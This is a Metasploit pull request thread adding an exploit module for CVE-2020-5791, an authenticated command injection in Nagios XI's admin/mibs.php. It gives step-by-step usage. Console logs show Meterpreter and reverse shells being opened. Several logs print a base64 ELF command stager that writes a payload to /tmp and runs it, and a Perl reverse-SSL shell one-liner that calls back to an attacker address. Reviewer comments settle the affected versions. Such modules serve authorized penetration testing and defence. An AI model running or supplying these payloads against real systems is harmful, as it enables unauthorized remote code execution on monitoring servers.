Add Nagios XI Mibs.php Authenticated RCE module and docs
rapid7/metasploit-framework pull request #14698
Opened 2021-02-01 22:43 UTC by kalba-security

## About
This changes adds a module to `modules/exploit/linux/http/` that exploits an OS command injection vulnerability (CVE-2020-5791) in Naxios XI version 5.7.3 (and possibly older versions) to achieve remote code execution as the `apache` user. The `check` method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Naxios XI version 5.7.3 (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_mibs_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:41960) at 2021-02-01 09:43:38 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41962) at 2021-02-01 09:43:45 -0500

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

2021-02-06 07:21 UTC, bcoles commented
> This change adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-5791) in Naxios XI version 5.7.3 (and possibly older versions)

This is exploitable since 5.6.0. Affected versions are 5.6.0 to 5.7.3.

# NagiosXI 5.6.7 (success)

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=d2tgqn8pgcaidspmvqrn66e1j5;", "nagiosxi=tp7tbrat2d69o0bsp4e2kdnav3;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.7
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgEBdWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/WCJrn.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/wMnLa' < '/tmp/WCJrn.b64' ; chmod +x '/tmp/wMnLa' ; '/tmp/wMnLa' & sleep 2 ; rm -f '/tmp/wMnLa' ; rm -f '/tmp/WCJrn.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 10.1.1.114
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (10.1.1.117:4444 -> 10.1.1.114:32974) at 2021-02-06 00:46:19 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.1.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.6.0 (success)

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=4epk3kb8o26d5cin89p82r0h82;", "nagiosxi=qap817j8guj0qskhjbj5e98hb5;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgEBdWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/OtYXU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/zmLYj' < '/tmp/OtYXU.b64' ; chmod +x '/tmp/zmLYj' ; '/tmp/zmLYj' & sleep 2 ; rm -f '/tmp/zmLYj' ; rm -f '/tmp/OtYXU.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 10.1.1.119
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 14 opened (10.1.1.117:4444 -> 10.1.1.119:55512) at 2021-02-06 02:19:27 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
smeterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.5.9 (fail)

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[+] perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"10.1.1.117:4444",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
[*] Started reverse SSL handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=2492a84hdfmupn4tdsni3b6sr6;", "nagiosxi=bq3vt2fs0ra0mui2kbqlaet5a7;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.9
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Executing the payload
[*] Exploit completed, but no session was created.
```

# NagiosXI 5.4.10 (fail)

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=3bbidknhfh2b7bsi17b01ma444;", "nagiosxi=ntcf8rp9dqh48jcavk91src2v1;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.10
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgEBdWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/MDfhs.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/TNLRS' < '/tmp/MDfhs.b64' ; chmod +x '/tmp/TNLRS' ; '/tmp/TNLRS' & sleep 2 ; rm -f '/tmp/TNLRS' ; rm -f '/tmp/MDfhs.b64'"]
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > 
```

2021-04-01 17:36 UTC, kalba-security commented
The latest commit includes a rebase to take advantage of the latest mixin code, it also updates the vulnerable versions range and the docs.
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:55158) at 2021-04-01 13:18:20 -0400

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:55162) at 2021-04-01 13:18:31 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

2021-04-16 17:18 UTC, gwillcox-r7 requested changes

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.
So may want to check if older versions are also affected, it seems like from what I can tell the vulnerability was only listed as affecting version 5.7.3 according to the CVE but I'm sure this also affected older versions. This might affect how we do the `check` method depending on the results. Seems this was fixed in 5.7.4 according to https://www.nagios.com/downloads/nagios-xi/change-log/

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
```suggestion
Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +4. Do: `set USERNAME [username for the Nagios XI account]`
```suggestion
4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +5. Do: `set PASSWORD [password for the Nagios XI account]`
```suggestion
5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +0   Linux
```suggestion
0   Linux (x86/x64)
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +   0   Linux
```suggestion
   0   Linux (x86/x64)
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +              'Linux', {
```suggestion
              'Linux (x86/x64)', {
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +          This module exploits an OS command injection vulnerability in `admin/mibs.php`
```suggestion
          This module exploits CVE-2020-5791, an OS command injection vulnerability in `admin/mibs.php`
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
```suggestion
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +            'Erik Wynter' # @wyntererik - Metasploit'
```suggestion
            'Erik Wynter' # @wyntererik - Metasploit
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +            'Reliability' => [REPEATABLE_SESSION]
```suggestion
            'Reliability' => [ REPEATABLE_SESSION ]
```

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
As noted in other PRs, this code will stack trace if `login_result` was `4` after calling `login_after_install_or_license`, as in these cases `res_array` will be an array with only one element inside of it. Leaving this for now as its less likely that this case will be encountered given all the other checks that are going on but still something to be aware of.

2021-04-16 17:18 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +        'type' => '1',
May want to check if this number can be randomized, might not be the case though.

2021-04-16 17:42 UTC, gwillcox-r7 commented
Alright so looks like this is 5.6.0 to 5.7.3 as mentioned in the description as I wasn't able to get this exploit working on 5.5.6 at all. Therefore logic atm looks correct and I'll just go ahead and update the minor sections needed to explain that these are the affected versions.

2021-04-16 17:45 UTC, bcoles commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.
https://github.com/rapid7/metasploit-framework/pull/14698#issuecomment-774416936

2021-04-16 17:51 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +This module exploits an OS command injection vulnerability (CVE-2020-5791) in `admin/mibs.php` that enables
Was determined to be 5.6.0 and later as 5.5.6 did not work with this exploit.

2021-04-16 17:51 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
> +obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.
Was determined to be 5.6.0 to 5.7.3.

2021-04-16 18:12 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
> +        'type' => '1',
Appears this has to be 1 or the exploit fails so going to mark this as resolved since it cannot be changed.

2021-04-16 18:13 UTC, gwillcox-r7 commented
Alright all changes should now be made going to push this up and then it should be ready to land since I successfully tested this against a 5.6.5 machine.

2021-04-16 19:34 UTC, gwillcox-r7 approved these changes

2021-04-16 19:38 UTC, merged

2021-04-16 19:40 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit CVE-2020-5791, an OS command injection vulnerability in the `admin/mibs.php` page of NagiosXI 5.6.0 to 5.7.3 inclusive. Successful exploitation requires valid credentials for an administrative user and grants RCE as the `apache` or `www-data` user.

2021-04-19 14:30 UTC, gwillcox-r7 commented
@kalba-security Trying to do a demo video for this module but it seems like when I am testing it today its not working against 5.6.5. Here are my results:

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.170.103   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit

[*] Started reverse SSL handler on 172.21.163.243:8888 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > 
```

This is the same even after rebooting the target. Do you know if it happens to overwrite some file that might prevent the exploit from working again?

2021-04-19 15:12 UTC, kalba-security commented
> 
> This is the same even after rebooting the target. Do you know if it happens to overwrite some file that might prevent the exploit from working again?

Hey @gwillcox-r7 I don't think so, but I'm not sure. While working on this module I was able to exploit my target system repeatedly without issues. I mostly tested it against Nagios XI 5.7.3 I think, but I also against 5.6.5 and perhaps one or two other versions. The main issue I had with this that only two payloads seem to work reliably. Have you tried running this with `cmd/unix/reverse_openssl` ? The writeup for this vuln doesn't mention anything being written to disk either: https://www.tenable.com/security/research/tra-2020-58

2021-04-19 17:21 UTC, gwillcox-r7 commented
> > This is the same even after rebooting the target. Do you know if it happens to overwrite some file that might prevent the exploit from working again?
> 
> Hey @gwillcox-r7 I don't think so, but I'm not sure. While working on this module I was able to exploit my target system repeatedly without issues. I mostly tested it against Nagios XI 5.7.3 I think, but I also against 5.6.5 and perhaps one or two other versions. The main issue I had with this that only two payloads seem to work reliably. Have you tried running this with `cmd/unix/reverse_openssl` ? And what happens when you use a cmdstager (target 0)? The writeup for this vuln doesn't mention anything being written to disk either: https://www.tenable.com/security/research/tra-2020-58

Hmm still not working:

```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.170.103   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_openssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit

[*] Started reverse double SSL handler on 172.21.163.243:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > 
```

2021-04-19 18:45 UTC, gwillcox-r7 commented
Alright I just tried this again on a clean brand new install and its still not working. Something weird is going on here.